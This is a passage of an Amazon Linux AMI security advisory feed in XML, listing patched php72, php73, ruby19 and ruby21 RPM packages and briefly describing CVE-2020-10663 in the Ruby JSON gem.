</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7068" title="" id="CVE-2020-7068" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-ldap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.33" 
release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package 
name="php72-tidy" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.33" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.33-1.25.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.33" release="1.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-gd-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.33" release="1.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-json-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.33" release="1.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-xml-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.33" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.33-1.25.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.21" release="1.28.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package 
name="php73-dba" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.21" release="1.28.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-snmp-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.21-1.28.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.21" release="1.28.amzn1" 
epoch="0" arch="i686"><filename>Packages/php73-common-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.21" release="1.28.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-cli-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.21-1.28.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.21" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.21-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1426</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1426: medium priority package update for ruby19 ruby21</title><issued date="2020-08-26 23:10:00" /><updated date="2020-08-31 20:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10663:
The JSON gem through 2.2.0 for Ruby, as used in Ruby 2.4 through 2.4.9, 2.5 through 2.5.7, and 2.6 through 2.6.5, has an Unsafe Object Creation Vulnerability. This is quite similar to CVE-2013-0269, but does not rely on poor garbage-collection behavior within Ruby. Specifically, use of JSON parsing methods can lead to creation of a malicious object within the interpreter, with adverse effects that are application-dependent.
1827500: CVE-2020-10663 rubygem-json: Unsafe Object Creation Vulnerability in JSON
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10663" title="" id="CVE-2020-10663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby21-devel" version="2.1.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.9-1.23.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.9-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygems21" version="2.2.5" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.5-1.23.amzn1.noarch.rpm</filename></package><package name="ruby21-irb" version="2.1.9" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.9-1.23.amzn1.noarch.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.9-1.23.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.9" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.9-1.23.amzn1.noarch.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygems21-devel" version="2.2.5" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.5-1.23.amzn1.noarch.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.23.amzn1.x86_64.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.23.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" 
version="2.1.9" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.9-1.23.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.9-1.23.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.23.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.9-1.23.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.23.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.9-1.23.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.9" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.9-1.23.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.23.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-33.71.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="33.71.amzn1" epoch="0" 
arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-33.71.amzn1.noarch.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-33.71.amzn1.noarch.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygems19" version="1.8.23.2" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-33.71.amzn1.noarch.rpm</filename></package><package name="ruby19-irb" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.551-33.71.amzn1.noarch.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.551-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="33.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-33.71.amzn1.x86_64.rpm</filename></package><package name="rubygems19-devel" version="1.8.23.2" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-33.71.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="33.71.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-33.71.amzn1.noarch.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="33.71.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-33.71.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.551-33.71.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="33.71.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-33.71.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="33.71.amzn1" epoch="0" 